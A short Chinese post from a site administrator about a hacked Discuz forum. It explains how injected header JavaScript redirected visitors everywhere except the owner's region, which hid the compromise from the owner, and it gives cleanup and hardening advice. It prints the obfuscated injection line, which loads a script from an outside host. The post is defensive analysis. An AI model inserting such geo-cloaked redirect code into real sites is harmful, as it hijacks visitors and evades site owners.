你是否遇到过你的网站打开一会就自动跳转到其他页面，而且这个问题是你的用户告诉你的，而你自己却没有遇到?

　　discuz挂马弹出页面

　　经过葱子我细心的对挂马网站做排查，终于让我找到了问题所在。

　　挂马者是通过在discuz的头部js文件里面添加了劫持js代码，通过判断访问者的IP来实现不同跳转的。

　　具体代码如下：

　　document.write("<\163"+"cript src='http://\141"+"d.\172"+"om"+"12\63"+".n"+"et/i"+"p.asp?l"+"oc=chengdu'><\/s"+"cript>");

　　可以看出，后面有个“chengdu”代码，这段代码的意思就是IP为成都地区的访问者在访问被挂马页面时不做跳转。其余地区的IP访问者则跳转。

　　从这段代码我们就可以看出挂马者是多么的用心险恶。

　　他首先根据你网站所在地进行判断网站管理员经常使用的IP地址所在地，然后有针对性的对网站管理员不做跳转劫持。

　　所以，这种劫持的情况下，网站管理者非常难以发现到网站被挂马了。

　　解决办法也比较简单：

　　首先校验下原始文件，对比下哪些js文件近期有被改动过，然后针对被改动过的js文件做以上代码段的排除。找到以上代码段后，删除即可。

　　最后说一下，各位网站管理者一定要注意保管好网站和服务器的管理密码，尽量设置的复杂一点。同时也要及时检测服务器是否存在漏洞等，及时做针对性处理，以避免类似的事情再发生。